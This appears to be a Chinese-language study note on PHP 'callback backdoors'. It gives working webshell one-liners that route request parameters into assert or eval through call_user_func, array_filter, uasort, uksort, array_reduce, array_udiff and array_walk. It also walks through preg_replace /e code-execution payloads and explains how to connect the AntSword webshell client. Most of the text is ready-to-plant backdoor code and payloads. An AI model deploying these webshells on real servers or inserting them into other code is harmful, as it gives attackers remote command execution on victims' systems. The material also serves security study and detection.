回调后门 函数

call_user_func

call_user_func把第一个参数作为回调函数调用，其余参数是回调函数的参数。

eval在php中不被当作一个函数，是动态执行指令。

$_REQUEST可以接收get post cookie

assert在php7.4及以后用不了了

<?php call_user_func('assert', $_REQUEST['pass']);

?pass=phpinfo();——>会把phpinfo();传给assert执行。

<?php call_user_func_array('assert', array($_REQUEST['pass']));
// 把数组中的元素都交给assert

怎么让蚁剑连接呢？

http://127.0.0.1/RCE/a.php?pass=eval($_POST['abc'])
//为什么要加eval?
//当蚁剑发送 POST 请求时，参数 abc 中是一段经过编码的恶意代码（如蚁剑的 payload）。如果没有 eval，这段代码只会被当作普通字符串处理，而不会被执行。
加上 eval 后，$_POST['abc'] 的内容会被当作 PHP 代码动态执行，从而实现远程命令控制。

进一步思考，在平时的php开发中，遇到过的带有回调参数的函数绝不止上面说的两个。这些含有回调参数的函数，其实都有做“回调后门”的潜力。

array_filter

<?php
$e = $_REQUEST['e'];
$arr = array($_POST['pass'],);
array_filter($arr, base64_decode($e));
//给e传值assert，但是代码中有解码base64_decode，所以要先给assert进行base64编码（YXNzZXJ0）

array_filter — 使用回调函数过滤数组的元素，第一个是参数，第二个参数是回调函数。

此时是php7.3的版本，警告说assert不能动态传入

使用5.3版本成功了

uasort

uasort — 使用用户定义的比较函数对数组进行排序并保持索引关联，第二个参数是回调函数。

<?php
$e = $_REQUEST['e'];
$arr = array('test', $_REQUEST['pass']);
uasort($arr, base64_decode($e));

uksort

uksort — 使用用户自定义的比较函数对数组中的键名进行排序，必须写键名

<?php
$e = $_REQUEST['e'];
$arr = array('test' => 1, $_REQUEST['pass'] => 2);
uksort($arr, $e);
//payload和uasort一样，因为传的就是key。只是assert可以不用编码。

attay_reduce

array_reduce — 用回调函数迭代地将数组简化为单一的值，第二给是回调函数。

reduce把一个函数作用在一个序列上，这个函数必须接收两个参数，reduce把结果继续和序列的下一个元素做累积计算。

<?php
$e = $_REQUEST['e'];
$arr = array(1);
array_reduce($arr, $e, $_POST['pass']);
//相当于把pass的值追加道arr中

array_udiff

array_udiff — 用回调函数比较数据来计算数组的差集,回调函数在第三个。

<?php
$e = $_REQUEST['e'];
$arr = array($_POST['pass']);
$arr2 = array(1);
array_udiff($arr, $arr2, $e);
//payload和array_reduce一样

preg_replace

preg_replace — 执行一个正则表达式的搜索和替换。

当使用被弃用的 e 修饰符（preg_replace 的 /e 模式）时, 它允许将匹配的字符串作为 PHP 代码执行，始终使用 eval。

第一个参数是匹配的模式，第二个是更换后的内容，第三个是原内容。

<?php
$string = 'April 15, 2003';
$pattern = '/(\w+) (\d+), (\d+)/i';
$replacement = '${1}1,$3';
echo preg_replace($pattern, $replacement, $string);
?>
//结果 April1,2003

深入研究preg_replace \e模式下的代码执行

<?phpfunction complex($re, $str) {return preg_replace('/(' . $re . ')/ei',//匹配'strtolower("\\1")',//把匹配到的转为小写，\1引用正则中第一个捕获分组 ( ) 的内容$str//传入的值);
}foreach($_GET as $re => $str) {echo complex($re, $str). "\n";
}function getFlag(){@eval($_GET['cmd']);
}

上面假如替换以后是 eval(‘strtolower(“\1”)’)

.*匹配除换行符以外的所有字符

.*={${phpinfo()}}

re就是.* 能匹配到传入的值{${phpinfo()}}

此时就是eval(strtolower({${phpinfo()}}))

原先的语句： preg_replace(‘/(’ . $re . ‘)/ei’, ‘strtolower(“\1”)’, $str);
全部匹配 ${}
变成了语句： preg_replace(‘/(.*)/ei’, ‘strtolower(“\1”)’, ${phpinfo()});

但是php中会把点替换成下划线

[\s]表示，只要出现空白就匹配[\S]表示，非空白就匹配那么它们的组合[\s\S]，表示所有的都匹配"."是不会匹配换行的，所有出现有换行匹配的时候，就习惯使用[\s\S]来完全通配模式。

要让代码可以被执行，就是换一个正则表达式让其能够匹配到 {${phpinfo()}}

所以可以使用\S*=${phpinfo()}

还有一个payload：\S*=${getFlag()}&cmd=phpinfo();

eval(strtolower(${getFlag()}))，就会调用getFlag()，执行cmd命令

array_walk

array_walk — 使用用户自定义函数对数组中的每个元素做回调处理

第一个是数组，第二个是回调函数

<?php
$e = $_REQUEST['e'];
$arr = array($_POST['pass'] => '|.*|e',);
array_walk($arr, $e, '');

试试e=assert,pass=phpinfo();不行。
pass=phpinfo();是不变的，即$arr (‘phpinfo()’ => ‘|.|e’)
e=preg_replace
preg_replace('|.|e’, ‘phpinfo()’,‘’)